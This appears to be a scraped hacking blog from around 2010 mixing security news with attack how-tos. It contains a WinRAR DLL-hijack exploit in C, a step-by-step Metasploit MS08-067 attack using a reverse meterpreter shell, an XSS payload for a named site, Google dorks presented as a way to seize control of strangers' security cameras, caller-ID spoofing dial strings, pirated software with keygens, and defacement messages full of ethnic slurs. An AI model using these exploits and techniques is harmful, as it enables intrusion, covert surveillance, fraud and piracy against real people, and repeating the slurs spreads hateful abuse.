Carjacking OR Car Hacking: Car Thieves are Switching

Carjacking OR Car Hacking: Car Thieves are Switching

Earlier we have posted that Hackers Can Hack Your Car: Hacking A Car is Possible Now AND How to hijack sensor communications of Wireless Car: Hack Wireless Car. Continuing to this.....

New cars have a tremendous pile of electronics that control almost every feature of the car, but a group of researchers at UC San Diego and University of Washington says that thieves are starting to hack at these very systems to gain control over the car.

A well-equipped car will have over 100 computers controlling everything from the door locks and brakes, to the starter and ignition system, but what is surprising is that many of these systems are interconnected. For example, a computer won't let the starter engage unless the driver is stepping on the brakes. The problem is that hackers are figuring out ways to hack into the system, making it much easier to steal the car without having to cut or break anything.

All cars built since 1996 already have a handy-dandy computer diagnostic port to make access easy, but you need to be inside the car to get to it. Luckily for the thieves, many cars are now adding wireless features, making it possible to launch an attack from outside the vehicle.

The researches hope that their work will convince the car manufacturers to step up their security protocols.

Cross Site Scripting [XSS] Vulnerability Found http://wikimapia.org

Cross Site Scripting [XSS] Vulnerability Found http://wikimapia.org.

CLICK HERE TO CHECK YOURSELF.

Below is the screen shot after executing the script. You can also do some fun.

Step 1: Open http://wikimapia.org

Step 2: On top right side you will see a search option

Step 3: Insert you script here

Step 4: Script is: [script]alert("YOUR TEXT HERE ")[/script]

NOTE: Replace [ with < & ] with > in the above script

Indian Cyber Army Restored 44 Indian Websites Hacked by Pakistan Cyber Army

Indian Cyber Army Restored 44 Indian Websites Hacked by Pakistan Cyber Army.

This restoration work has been done in less then 24 hours. If you check the below screen shots posted by Pakistan Cyber Army, its showing 08-28-2010 06:32 AM & the Indian Cyber Army guys posted the information regarding this restoration on 08-28-2010 05:03 PM. As per Indian Cyber Army, Pakistani hackers only mentioned 43 defaced sites, but forgotten to mention about 44th website & the same has also been resorted.

According to Pakistan Cyber Army, this is the pay back of GANG BANG project started by Indian Cyber Army. The response from PCA has been given after almost 15 days, but the ICA has responded back with in 24 hours by restoring all the hacked websites.

Now I leave it up to you..WHICH CYBER ARMY IS BETTER. Just leave a comment here.

Below is the list of all Indian websites restored b INDIAN CYBER ARMY

- http://enkeicastalloy.co.in/pak.html - Restored by I.C.A

- http://blog.dsksic.com/pak.html - Restored by I.C.A

- http://dsksic.com/pak.html - Restored by I.C.A

- http://dskschool.in/pak.html - Restored by I.C.A

- http://deccancollegepune.ac.in/pak.html - Restored by I.C.A

- http://cyplagear.com/pak.html - Restored by I.C.A

- http://cirtindia.com/pak.html - Restored by I.C.A

- http://carbtools.co.in/pak.html - Restored by I.C.A

- http://bpm.ikf.in/pak.html - Restored by I.C.A

- http://awakeningjagriti.org/pak.html - Restored by I.C.A

- http://indianforging.org/pak.html - Restored by I.C.A

- http://imscdr.in/pak.html - Restored by I.C.A

- http://iitp.ikf.in/pak.html - Restored by I.C.A

- http://hmttractors.co.in/pak.html - Restored by I.C.A

- http://helpdesk.ikf.co.in/pak.html - Restored by I.C.A

- http://goashipyard.co.in/pak.html - Restored by I.C.A

- http://fresenius-kabi.co.in/pak.html - Restored by I.C.A

- http://safehousepune.com/pak.html - Restored by I.C.A

- http://romanresearch.info/pak.html - Restored by I.C.A

- http://realestate.ikf.co.in/pak.html - Restored by I.C.A

- http://pune-merchants.com/pak.html - Restored by I.C.A

- http://procomsys.in/pak.html - Restored by I.C.A

- http://pict.edu/pak.html - Restored by I.C.A

- http://nexgenieplc.com/pak.html - Restored by I.C.A

- http://mymantra.in/pak.html - Restored by I.C.A

- http://messung.ikf.in/pak.html - Restored by I.C.A

- http://messung.com/pak.html - Restored by I.C.A

- http://manoharshubhamangal.com/pak.html - Restored by I.C.A

- http://lotuslandmarks.com/pak.html - Restored by I.C.A

- http://kumarenterprises.com/pak.html - Restored by I.C.A

- http://kjtherm.com/pak.html - Restored by I.C.A

- http://jaltap.org.in/pak.html - Restored by I.C.A

- http://zawaresacademy.com/pak.html - Restored by I.C.A

- http://tropicoolindia.com/pak.html - Restored by I.C.A

- http://takemyshipment.com/pak.html - Restored by I.C.A

- http://tacogroup.com/pak.html - Restored by I.C.A

- http://support.messung.com/pak.html - Restored by I.C.A

- http://softmax.co.in/pak.html - Restored by I.C.A

- http://siuconference.in/pak.html - Restored by I.C.A

- http://sitm.ac.in/pak.html - Restored by I.C.A

- http://silasers.com/pak.html - Restored by I.C.A

- http://shobhaindani.in/pak.html - Restored by I.C.A

- http://sharadaerp.com/pak.html - Restored by I.C.A

The below two WARNING messages has been posted by Indian Cyber Army to Pakistan Cyber Army After restoring the websites

MESSAGE: 1

Well Well Well So P0rkistan Finally Managed to Hack few indian sites :P after a long struggle with your balled heads

Just Clear Me one Thing you guys even have brains in your head? what the f**k !! Let me Tell you a joke :P

LONG LONG AGO THERE WAS A MIRROR IN FRANCE PERSON WHO EVER TELLS LIE STANDING IN FRONT OF THE MIRROR THEY WILL DIE .. SO FIRSTLY

FRECH PERSON CAME AND HE SAID I THINK I CAN KILL ANYONE AND HE DIED COZ HE LIED

JAPANESE CAME HE SAID I THINK I CAN MAKE A MACHINE WHICH CAN CONRTOL HUMAN BRAIN AND HE DIED

CHINESE CAME HE SAID I THINK I CAN DRESS UP WELL AND HE DIED

P0RKISTANI CAME HE SAID I THINK AND HE DIED INSTANTLY ..

SO THINKING IS OUT OF YOUR BUSINESS BLACKZER0 YOUR OF THE SAME KIND YOU CAN'T THINK IF U THINK THEN YOU WILL DIE COZ ITS NOT OF YOUR NATURE YOUR NOT BORN TO THINK YOUR BORN TO BEG

YOU ARE OF 16 .. ANYONE ASKED YOU ? AREY SALE IF YOU 16 YEAR HA*****ED M**LE CAN HACK THIS THEN AM OF 17 YEARS SO WHAT CAN I DO :P NOW PLEASE DONT THINK WHAT I CAN DO ELZE YOU WIL DIE :|

WHAT IS THERE IN YOUR PAKISTAN OOPS SORRY P0RKI1STAN :| SORRY PO****TAN SORRY MA*****STAN :d

SEE HOW MANY GOOD NICKNAMES I GAVE TO YOU

THIS IS OUR POWER WE CAN DESTORY AND WE CAN CREATE

PEACE DEAL PEACE DEAL PEACE _|_ THAT'S YOUR ONLY ADVANTAGE YOU ALWAYS HAVE BETRAYING US WE SHOWED WITH PROOFS WHO BROKE THAT

WHEN EVER YOU EVEN THINK OF MESSING ( SORRY MY MISTAKE I FORGOTED THAT U CAN'T THINK ) YOU WILL GET THIS TYPE OF FUNNY SHIT ... YOUR MAKING FOOL OF YOURSELF

MY MSG:- NO MSG ONLY WARNING STOP TARGETING INDIAN SITES ELZE YOU WILL SEE ANOTHER GANG BANG PROJECT ALREADY HALF OF YOUR SPACE F***ED UP WHAT ELZE YOU WANT? BHOOL JA!!!

JYADA MAT UDO NAHI THO INDEX PAGE BADAL JAYEGA LOL

ALL THE 43 SITES WHICH YOU HACKED HAVE BEEN RESTORED WITH THE SAME PAGE

KINDLY LET ME KNOW IF YOU GUYS WANNA SE A GANG BANG AGAIN WE WILL START IT RIGHT AWAY COZ I CAN'T REFUSE THE REQUEST OF MY DEAREST ENEMY

WE ARE :- Stranger -[SiLeNtp0iS0n]- inx_ro0t D@rkl00k aka Ajay str1k3r ne0 h4ck3r atuldwivedi g00gl3 w@rr10r

Special Gr33tz:- Jackh4x0r , HackMypC

Shouts to :- Sam , unknownsoilder , ethicaln00b , the_dead_code aka , shadowclone , and all indishell crew sorry its too big can't name them all lol :P

l0ng live INDIA

JAI HIND

Admin contact us at :- www.indishell.in for patching your security we will pleased to do it :)

INDIAN CYBER ARMY STRIKED AGAIN :D

---------------------------------------------------------------------------------------

Message: 2

PAKISTANI CH**IYA ARMY WAS HERE

If you wanna start a abusing game then start it ..

We Pakistani Ch**iya army here by suking the d***s of indian hackers

what can you do except this all your defacements got edited and you still defacing the same sites again and again that's the only thing you can do

Kitne baar hack karoge k**te ke bacho PCA ( pakistani ch***ya Army )

now Kindly STFU and GTFO

WWW.INDISHELL.IN

Download Internet Download Manager v6.01 | Keygen and Patch Included

Internet Download Manager v6.01 Build 6 Incl. Keygen and Patch-Lz0 | 9.22MB

Internet Download Manager (IDM) is a tool to increase download speeds by up to 5 times, resume and schedule downloads. Comprehensive error recovery and resume capability will restart broken or interrupted downloads due to lost connections, network problems, computer shutdowns, or unexpected power outages. Simple graphic user interface makes IDM user friendly and easy to use.Internet Download Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads. Unlike other download managers and accelerators Internet Download Manager segments downloaded files dynamically during download process and reuses available connections without additional connect and login stages to achieve best acceleration performance.

Download from [Hotfile.com]

Download Avast Antivirus Professional Edition v4.8.1290 With Key

Avast! antivirus professional edition v4.8.1290 incl key | 29.02 Mb

Avast! Professional Edition 4.8 is a collection of award winning, high-end technologies that work in perfect synergy, having one common goal: to protect your system and valuable data against computer viruses, spyware and rootkits. It represents a best-in-class antivirus solution for any Windows-based workstation.

Avast 4.8 Professional Edition is a complete ICSA and Checkmark certified antivirus, Checkmark certified anti-spyware and anti-rootkit software package for corporate and advanced home use. avast Professional Edition includes an on demand scanner with two user interfaces, a skinnable simple interface: just select what you want to scan and in which way and press the play button, an enhanced user interface: Outlook like UI allows users to set any feature of Avast, prepare and run tasks, store and check task results, on access scanner: special providers to protect: most available e-mail clients, instant messaging: ICQ or Miranda, network traffic: lightweight firewall, P2P protection for Kazaa, BitTorrent, Web shield: all HTTP traffic, script blocker. avast Professional Edition is available in 32 languages. Small, true incremental, updates are downloaded.

Home Page - http://www.avast.com/eng/avast_4_professional.html

DOWNLOAD HERE

Download Kaspersky Internet Security/AntiVirus 2011

Kaspersky Anti-Virus 2011, it would soon be sold in stores or already sold, as well as a link to download the official site. Kaspersky Internet Security & Kaspersky Anti-Virus, 2011 - a new step in protecting your computer. The new product line appeared very much innovation.

WHAT'S NEW?

In Kaspersky Internet Security 2011 came the following innovations:

A new component of protection activity monitoring software monitors the activity in the system and provides detailed information to other components of the defense. In addition, preserves the history of activity programs, the component can roll back the actions of the malware when it detects malicious activity by various components of the defense.

Enhanced functional security environment safe execution of programs is a stand-alone desktop, where you can run suspicious programs without harm to the underlying operating system.

To enhance protection for internet added a new module: Web Filter - includes module testing options, already known from previous versions and provides the ability to block access to malicious Web sites that allow you to stay within the safe zone Internet .

Geo-filter - allows you to enable or disable access to websites based on their belonging to the domains. It helps, for example, prohibit access to websites belonging to the regional domains with a high degree of contamination.

The control software allows you to better determine the status of programs and set up rules for the programs, using data Kaspersky Security Network, based on the statistics of the control programs on the computers set of users.

With a check-in computer is idle check your computer for viruses now can be done in those periods when you are away from your PC, and stop when you return to work at the computer. This allows you to regularly check and at the same time does not affect your computer when you need it.

The functionality of Parental Control: Now you can control user access to a computer and internet users from running computer programs to restrict viewing of web pages with inappropriate content, and download files from the Internet, to control user interaction in social networks and through internet-pager, as well as view reports the actions controlled by the user. To optimize the parental control settings provide export and import parameters of the component for

Home : http://www.kaspersky.com/

=============================================

Download from [Hotfile.com]

http://hotfile.com/dl/66223722/d461381/K110.part01.rar.html

http://hotfile.com/dl/66223763/8c86121/K110.part02.rar.html

http://hotfile.com/dl/66223781/6cf3d33/K110.part03.rar.html

http://hotfile.com/dl/66223794/428880f/K110.part04.rar.html

http://hotfile.com/dl/66223818/8cd8df9/K110.part05.rar.html

http://hotfile.com/dl/66224272/aaad926/K110.part06.rar.html

http://hotfile.com/dl/66224056/ecaaa4c/K110.part07.rar.html

http://hotfile.com/dl/66224200/c54dda7/K110.part07.rar.html

http://hotfile.com/dl/66224257/9baa542/K110.part08.rar.html

===========

Mirror [Fileserve.com]

http://www.fileserve.com/file/xzmBxQq/K110.part01.rar

http://www.fileserve.com/file/shasmYj/K110.part02.rar

http://www.fileserve.com/file/KZTnyBe/K110.part03.rar

http://www.fileserve.com/file/U3fHDR3/K110.part04.rar

http://www.fileserve.com/file/8sJTSk9/K110.part05.rar

http://www.fileserve.com/file/kVduct2/K110.part06.rar

http://www.fileserve.com/file/Z9fufXa/K110.part07.rar

http://www.fileserve.com/file/8CNf9nX/K110.part08.rar

Secure Computer: Password Protect Windows Applications

WinGuard Pro 2010 v7.3.5 Premium Edition | 1.65 MB | Secure your computer by password protecting your Windows applications, programs and EXE files.

Plus, protect your data with encryption for your files, folders and drives - directly from Windows Explorer. Extra features allow you to disable the Task Keys, Software Installation, Internet Explorer, Mozilla FireFox, Downloading Files, Zip and Self Extracting Files and the Boot Keys (F8).

Features:

• Lock Programs, Applications, EXE Files with a Password

• Encrypt Files, Folders and Entire Drives with Strong 128 bit AES

• Disable users changing the Desktop Wallpaper

• Disable Windows at Boot and the Boot Keys (F8) *

• Disable Software Installation *

• Password Protect Windows Explorer

• Password Protect your Web Browser, inc. Internet Explorer, FireFox, Opera and Downloads

• Lock Zip and Self Extracting files, Desktop, Task Keys and setup multiple users

• It's FREE, no adverts, nag screens or spyware

• Works alongside your firewall and anti-virus program

Download

DOWNLOAD LINK 1

DOWNLOAD LINK 2

DOWNLOAD LINK 3

DOWNLOAD LINK 4

International Phone Fraud Reported in Batavia

Batavia police are investigating two strange cases of apparently international crimes involving telephones. Police began investigating a case of telephone fraud about 1:30 p.m. Aug. 23 at Parksite Inc., 1563 Hubbard Ave.

Someone apparently called the business when it was closed, hacked into an outside line and made and received 22 calls to and from Cuba and Bermuda. Police are following up the investigation with AT&T.

And an elderly, disabled man living on the 100 block of First Street reported he received a phone call at about 8:30 p.m. Aug. 23 from someone saying his nephew was being held by the Canadian Border Patrol on drug charges and was requesting $5,600 to be sent to Haiti.

Islamic hackers invade website of Belvoir Castle in protest over Israeli foreign policy

Computer hackers left tourists bemused after replacing a stately home's website with a message protesting Israeli foreign policy. Since about 4.30pm on Friday afternoon, visitors searching for details on Belvoir Castle, near Grantham, have instead found a black page displaying the Algerian flag and lines of text in Arabic.

Last night, IT experts for the castle, the ancestral home of the Duke of Rutland, were still trying to remove the unwanted homepage – although the rest of the site appeared to still be accessible via Google.

A spokesman for the castle said they had no idea why the early 19th century property had been targeted in such a manner.

The number of so-called "defacement" attacks has risen in recent years, with hackers from countries such asEgypt, Turkey, Iran, Syria, Iraq, Saudi Arabia and Morocco hijacking sites.

The Bank of Israel has previously been targeted with hackers posting anti-Israeli, anti-American and pro-Palestinian messages.

The number of such attacks rocketed during the Israel-Lebannon conflict last year, with a number of sites seemingly unrelated to the conflict caught up in the digital vandalism.

On this occasion, the hacker behind the attack appears to be someone who operates under the alias Blackhunter.dz and claims to be part of an Algerian subversive group called the Dz-SeC Team.

He wrote the following, in Arabic, on the Belvoir Castle website: "The cause of this hack is Israel's presence in the 'Serfor'.

"Internet law does not protect the ignorant.

"Thank you to all the pirates of Algeria."

He then went on to thank 13 of his fellow hackers and post the web address of the collective's discussion forum.

Internet expert Gary Warner, speaking to SC magazine in the aftermath of the Gaza conflict, said: "People are wanting to participate and support Palestine and they're finding ample opportunities through tools being created by hackers.

"You can have almost no skills on the computer and take one of these hacker tools and start using it.

"Anything on the internet that might get traffic is a valid target."

CALL SPOOFING: How to Make Spoof Calls From Mobile Phone

"Dial +9609710488p91 p91 .Technique you can call as any ones number to any number. The irony is that as per our cyber crime experts there is no solution to this.

+9609710488p9911245670p919998989898

Here it will display the no: 919911245670

And make call to this no: 919998989898

OR

CALL ON : +9609710488

Then wait for a beep after that dial the number you want to display in your friends number with the prefix 91 and then again wait for next beep, after that dial the number which you wanna call ... everything done, and call will get connected

SOURCE: CYBER TERROR

Have you ever wondered you could make a call to someone from your own mobile handset using someone else’s number? If not then Call spoofing is an answer to your question. Call spoofing is the ability to spoof caller ID and SMS messages. One can change what someone sees on their call display when they receive a phone call to anything they want. This is characteristically referred to as "Caller ID Spoofing" or "Call Display Spoofing".

One can show any phone number they wish on call display, basically faking your caller ID. You can change your voice to male/female, record the conversation, spoof SMS text messages. One can indulge in such faking and yet roam about like a free bird as this facility PROTECTS ONES PRIVACY by not showing the real number on caller ID.Caller ID Spoofing is the practice of causing the network to show a number on the recipient's caller ID display which is not that of the actual originating station. It is a method adopted by people with malicious intent to harass people. It is similar to e-mail spoofing which makes it feasible for the sender to choose any e-mail id to send fake e-mails; caller ID spoofing can make a call appear to have come from any phone number the caller wishes. Because of the high trust people tend to have in the caller ID system, spoofing can call the system's value into question.

“I recently got missed calls for almost 3 consecutive days on my mobile phone from a vague number (a call made from the internet) at 3 am in the morning. I called up the Vodafone Customer care service to find out who the caller was. But they said they do not keep a track of missed call records”, said Mr. Vijay Mukhi, Member, High Court/State Government Committee on Pornography and Cyber Laws. “There is no point lodging a complaint as there will be no solution to this problem.” Mukhi added.

The first mainstream Caller ID spoofing service was Star38.com. It was launched in September 2004. Star38.com was the first service to allow spoofed calls to be placed from a web interface. It stopped offering service in 2005, as a handful of similar sites were launched. There are various websites available which provide free spoofing facilities like www.crazycall.net , http://www.spooftel.com/ etc.

Frequently, caller ID spoofing is used for prank calls. For example, someone might call a friend and arrange for "The White House" to appear on the recipient's caller display. In December 2007, a hacker used a caller id spoofing service and was arrested for sending a SWAT team to a house of an unsuspecting victim.

When AV asked why it doesn’t make sense lodging a complaint with police, he said, “The mobile service providers so not maintain a track of the calls. We pay them charges for Caller ID but they do not provide us caller details in return. Even if the Police questions the Companies about the call log sheets, they would decline saying they do not maintain one” said Mukhi. “However the missed call log on my mobile phone will be a prima-facie evidence for the police to arrest the call” he added. When asked what measures can be taken to curb such malicious deeds, Mukhi said, “The web provides calling services free of charge or at nominal rates. Mobile phone and landline prove expensive media for making International calls. People rely on the internet to make calls. Which is call spoofing websites are thriving.”

On asked how the police could tackle such a menace, Mukhi said, “Unless and until the mobile phone service providers start maintaining call log sheets, this problem is bound to exist. It is a helpless situation as with little or no evidence no action can be taken. The culprit indulging in call spoofing can get away with it.”

“The mobile service providers do not want to spend money to maintain call log details” Mukhi added.

The accusation on Paris Hilton in August, 2006 for using caller ID spoofing to break into a voicemail system that used caller ID for authentication is a classic example in this case.

AV (http://www.aftervoice.com/) contacted some of the Law keepers in the city to find out about call spoofing.

DCP (Zone 10) Prakash Muthyal said, “I have not come across such cases as yet. The Cyber Crime Cell might be able to give some inputs.”

DCP (Zone 4) SD Baviskar said, “ I have not heard of anything called call spoofing till date.”

DCP( Zone 11) Sharda Nigam said, “ Cases for call spoofing have never been registered with us. However I shall find out from our technical team about this.”

Ex- Commissioner of Police Hasan Gafoor said, “The Telecom Department will be able to give you a better picture of call spoofing. I would not be able to comment anything bout it.”

SOURCE: CYBER TERROR

NOTE

* To spoof your phone will call an international number , international rates will apply

* The spoof works only in india

* Number to call should start with the 91 prefix

* Dialing the spoof no: takes around 20 seconds

* Even if you try to make miss call you will loose money , since you are dialing an international no will charge isd rates

Cyber Terror | Cyber Terrorism | Cyber War | INDIA IS READY

Vaidehi Sachin, Group editor of News Maker, took a revolutionary step with the support from intelligence sources, to unite all ethical & unethical hackers of India. Register them under cyber employment act & create a new young army for Cyber security of our country INDIA.The intention is to rehabilitate youth lured in cyber crime.

For more details, you can write us at amarjit@freehacking.net OR cyberterrors@gmail.com

Visit: Cyber Terror

JAI HIND..!!

Any thing for INDIA, Every thing for INDIANS..!!

Exploit Title: WinRAR <= 3.7 Dll Hijack (riched20.dll)

Exploit Title: WinRAR <= 3.7 Dll Hijack (riched20.dll)

Date: August 30, 2010

Author: 41.w4r10r (41.w4r10r@gmail.com) Version: 3.7

Tested on: Windows XP Sp2 Eng

Vulnerable extensions: All Extentions Which WinRAR can open.

Greetz: Bond, neo, fb1h2s, Punter, Godwin_austin, The_Empty(), DZZ, Eberly, Micr0, Akee, All Indian Hackers

Catch us: http://www.garage4hackers.com/

Instructions: 1. Compile dll

2. Replace riched20.dll in WinRAR directory with your newly compiled dll

3. Open Any .rar or WinRAR supported file. or simply open WinRAR

*/

#include "stdafx.h"

#include "stdlib.h"

int g4h()

{

WinExec("cmd", SW_SHOW);

return 0;

}

BOOL APIENTRY DllMain( HANDLE hModule,

DWORD ul_reason_for_call,

LPVOID lpReserved

)

{

g4h();

return TRUE;

}

How to Enable Internet on BackTrack 4 ?

Working with Backtrack is well a learning experience and it stays a learning experience for a very long time. You have to mine the web every now and then to know about the "How to?"s. The very first problem you'll encounter after installing backtrack is 'Setting up an internet connection'. It is not as straightforward as Windows.

METHOD 1: GUI (How to Enable Internet on BackTrack 4 ?)
Well there is an easier way to do that using the inbuilt Wicd network manager. You might have stumbled upon this option in the menu while trying to get your Internet connection working. But merely clicking on the Wicd Network manager wont help you. An easy way to configure your ethernet or wireless interface is as follows:

Step 1: Open the terminal and enter the following command

/usr/bin/start-network

Step 2: Now open Wicd network manager and you will see a list of connections availabe, wireless as well as wired.

Happy Surfing!!!

METHOD 2: USING COMMAND LINE (How to Enable Internet on BackTrack 4 ?)

Note- Write all the parameters without the brackets[]. In the explanation below eth0 refers to the name of the lan interface. To know your interface type: "sudo ifconfig -a" in the terminal to print a list of available interfaces. If your interface is different from eth0, use your interface name instead of eth0.

1) Open the terminal
2) type in: sudo ifconfig eth0 up
3)Adding IP and netmask: sudo ifconfig eth0 [youripaddress] netmask [your netmask]
4) Adding the gateway: sudo route add default gw [your gateway] eth0
5) Adding the DNS server: sudo sh -c "echo nameserver [yourDNS]> /etc/resolv.conf"
6) To compile all the above entries sudo /etc/init.d/networking restart
7) To make the above setting default. If you skip this step you will have to configure your connection on every reboot. So to make the settings persistent: sudo update-rc.d networking defaults
8) Reboot: sudo reboot

And you are done. Now you can use your internet connection.

SOURCE: TECHKRANTI

Hack Hackers & Hacking

Whenever anyone hears the word “HACK” 1st he will check all his present email accounts are safe.Hack is like thread to a normal person and everyone wants to stay away from hackers. They all have negative image of hackers in their mind. Hackers penetrate the firewall enters in your account steal, destroy the information or data in your account and they go, hackers should keep behind the bars this is some general idea people have in their mind about hackers.Hacking is an art. Very few talented people have this in them, and these artists are called as hackers. Hackers doesn’t go to any random persons detail n destroy them. Its obvious that the great artist will always expect a great audience for him. Hackers don’t attack on the normal people they have their respective targets set.

According to my general observation each hacker have his different story for being a hacker.The government sabotages some so they chose the path of hacking, some have interest from childhood, some wants to show the government that how much we are lacking in our security n etc.Recently majority youth of nation is diverted toward this unusual sector of hacking. The avg age of hackers varies betn 15-25. They start training them selves form the age 4-7. I don’t think I would be knowing the C of a computer wen I was 7 yrs old.

This is a very different kind of a group of people with very large amount of potential and they are heading without ant direction. They don’t have anyone to support them, lack of unity, and the worst is everyone look at them as a criminal.

They have created their own virtual world, which is beyond imagination. The hackers need proper guidance, a platform where they can show their skills and make something good out of it. They are just heading to darker side of this world.

SOURCE: CYBER TERROR

Nowadays world is running on the Internet. Heavy transactions are getting done in a minute with the help of Internet. Friends, videos, photos, and marriages almost everything is there on the Internet. And the hackers are the masters of ruining it or making it better, so we need to make a proper platform for them n allow them to help us for better.

How to Hack Online Live Security Camera

Learn How to Hack Online Live Security Camera. Search any of the the below terms in GOOGLE and booom... you got it. You can see a live cam on your PC screen!!

In this Electronics video tutorial you will learn how to hack into live, public security cameras and web cams using Google without the owner even knowing this is happening. The video claims that there is nothing illegal about this.

View Security Cameras Worldwide. This will let you hack into random live security cameras all over the world and operate them. Then go to any of the search results and bingo, take control over the camera, move it around, change all the setting's...

• inurl:”CgiStart?page=”
• inurl:/view.shtml
• intitle:”Live View / – AXIS
• inurl:view/view.shtml
• inurl:ViewerFrame?Mode=
• inurl:ViewerFrame?Mode=Refresh
• inurl:axis-cgi/jpg
• inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
• inurl:view/indexFrame.shtml
• inurl:view/index.shtml
• inurl:view/view.shtml
• liveapplet
• intitle:”live view” intitle:axis
• intitle:liveapplet
• allintitle:”Network Camera NetworkCamera” (disconnected)
• intitle:axis intitle:”video server”
• intitle:liveapplet inurl:LvAppl
• intitle:”EvoCam” inurl:”webcam.html”
• intitle:”Live NetSnap Cam-Server feed”
• intitle:”Live View / – AXIS”
• intitle:”Live View / – AXIS 206M”
• intitle:”Live View / – AXIS 206W”
• intitle:”Live View / – AXIS 210?
• inurl:indexFrame.shtml Axis
• inurl:”MultiCameraFrame?Mode=Motion” (disconnected)
• intitle:start inurl:cgistart
• intitle:”WJ-NT104 Main Page”
• intitle:snc-z20 inurl:home/
• intitle:snc-cs3 inurl:home/
• intitle:snc-rz30 inurl:home/
• intitle:”sony network camera snc-p1?
• intitle:”sony network camera snc-m1?
• site:.viewnetcam.com -www.viewnetcam.com
• intitle:”Toshiba Network Camera” user login
• intitle:”netcam live image” (disconnected)
• intitle:”i-Catcher Console – Web Monitor”

Happy Cam Hacking Guys!!

Hack Websites & Servers Using Nessus & Metaspoilt: Step by Step Tutorial for Beginners

Friends, yesterday I have posted an article regarding How to Hack Websites & Servers from Scratch : Step by Step Tutorial for Beginners

Continuing to that post, today I will tell you how to find the vulnerability on any website or server using NESSUS and how to exploit it using Metasploit (MSF)

For this purpose i have used two system whom i have connected via WAN, host os does not matter, victim has xp installed on it.

Basic commands to be known:

1.searching anything: "search name"

2.set exploit: "use exploit_name"

3.set payload:"set payload payload_name"

4.see info: "info name"

STEP 1:

First instead of using nmap for port scanning , we have used nessus for the vul scanning, nessus has one more added advantage of giving each vul a number which helps in msf to search the proper exploit.

So, first we will scan the target.

In the above scan you can see how good nessus is in giving the information about the level of vulnerability. After analysing the report, we see 5 high vulnerability so clicking on the first one, lets see its details:

We can see lots of info about the vulnerability, vulnerability here service flaw at port 445 which has been given the number of MS08-067, this number is going to be of great help in future.

STEP2:

In msf, we are going to search for the proper exploit which can exploit it's vulnerability, so to make our search easier we are gonna type search number, wola see what we have got is the exact name of exploit, but for the other cases where you dont know the number or id , then also we can search by giving various parameters like name eg. search name etc...then we have to choose the best one among them by comparing all the requirnments and working.

Now , since here we have got the exact exploit, then we are going to use this exploit, command used for it:

use exploit name eg. use windows/smb/ms08_067_netapi

we will check the various parameters by typing: info windows/smb/ms08_067_netapi

STEP3:

Now it's time to set victim's ip address i.e.. RHOST , RPORT is already set to 445

command to set RHOST: setg RHOST 192.168.1.5

Note:(192.16.1.5 is the ip address of ma pc on local network whom i am going to attack)

STEP4:

After setting exploit, now its time to set the payload, so the main question arises which payload to use now??

Options for this questions can be shortened by typingshow payloads which gives the list of payloads which are compatible with that exploit.

In that we are going to select any payload , i prefer meterpreter/reverse_tcp.

To use this payload type the command: set payload windows/meterpreter/reverse_tcp

so , i will check it's paramater i.e.. LHOST, LPORT etc, now to check that , we type info windows/meterpreter/reverse_tcp

Now here we have to make some change LHOST, LHOST refers to the ip-address of attacker i.e.. mine.

So to set the LHOST we do : setg LHOST 192.168.1.10

All done we are now ready to exploit.

STEP 5:

Finally we type exploit wola.... attack sucessful, session is created.

Now, what to do now?? Just type the command help you will get a list of commands like kill process, shutdown,hash dumps, but i like shell because it gives you the full command line control of the system which you can see from the above picture.

NOTE:

1.This tutorial is only for learning purpose, for any illegal use author is not responsible.

2.Any form of use of this tutorial should be done at own risk.

Hack Websites & Servers Using Nessus & Metaspoilt: Step by Step Tutorial for Beginners

NOTE: This post I found from one Under the hood hackers website. All credit goes to S1ayer

Friends, yesterday I have posted an article regarding How to Hack Websites & Servers from Scratch : Step by Step Tutorial for Beginners

The Big Hacker Conspiracy

Is there a big hacker conspiracy happening right now inside your business? Research coming out of the DEFCON hacker convention suggests there is…

Surveys taken during the annual DEFCON hacker convention always throw up a few obvious but nonetheless important revelations. How about this one: hackers love it when they find misconfigured networks, and they find lots of them because so many IT workers have no idea what a properly configured network looks like.

Every year at DEFCON, Tufin Technologies survey the gathered security researchers and IT security professionals attending the convention (or hackers as they are called when they are not filling in questionnaires) in order to get a grip on the trends within the hacking community and how they impact upon corporate security strategies. The results of the 2010 ‘Hacking Habits’ survey, as it is known, were published this morning and make for interesting if somewhat predicable reading.

It turns out that some 73 percent of those surveyed stumble across misconfigured networks around three quarters of the time, and 76 percent of the hackers asked stated that such resources were the easiest to exploit. A further 58 percent of those asked suggested that the reason for these misconfigured networks being so prolific was simply that IT staff had no idea what to look for when it came to assessing the security status of their network configurations.

First rootkit targeting 64-bit Windows spotted in the wild

Alureon rootkit is back, and has acquired the ability to hijack computers running 64-bit versions of Microsoft Windows, proclaimed Marco Giuliani, security researcher with security company Prevx.

Alureon (also known as TDL and Tidserv) has garnered a lot of attention back in February when it was discovered that it was behind the system crashes occurring after infected users tried to update their Windows OS.

It seems that at that point in time, the rootkit was unable bypass the security features that made the 64-bit versions of Windows Vista and 7 more secure than their 32-bit counterparts - namely the Kernel Mode Code Signing and Kernel Patch Protection.

The Kernel Mode Code Signing does not permit digitally unsigned drivers to access the kernel memory region (and kernel mode rootkits are often not), and the Kernel Patch Protection prevents kernel mode drivers from modifying sensitive areas of the Windows kernel. But, both protection mechanisms can be obviously bypassed by this new version of Alureon, which patches the Master Boot Record in order to intercept Windows startup routines and then loads its driver.

"The rootkit needs administrative privileges to infect the Master Boot Record. Even then, it still cannot load its own 64 bit compatible driver because of Windows's kernel security. So, the dropper forces Windows to immediately restart. This way, the patched MBR can do the dirty work," says Giuliani.

Well, Windows restarting "by itself" like that seems to me like a good sign to start worrying.

Giuliani also points out that this is not the first rootkit to be able to pass those security roadblocks - a bootkit named Whistler has been spotted being offered for sale on various underground markets some time ago - but this is the first time that the use of such a rootkit has been detected in the wild. According to him, the era of x64 rootkits has officially dawned.

Researchers Cripple Pushdo Botnet

Researchers have made a huge dent in a major variant of the Pushdo botnet, virtually crippling the network by working with hosting providers to take down about two thirds of the command-and-control servers involved in the botnet.

Pushdo for years has been one of the major producers of spam and other malicious activity, and researchers have been monitoring the botnet and looking for ways to do some damage to it since at least 2007. Now, researchers at Last Line of Defense, a security intelligence firm, have made some serious progress in crushing the botnet's spam operations.

After doing an analysis of Pushdo's command-and-control infrastructure, the researchers identified about 30 servers that were serving as C&C machines for a variant of the botnet. Working with the hosting providers who maintained the servers in question, the LLOD researchers were able to get 20 of the C&C servers taken offline, the company said.

READ FULL STORY HERE

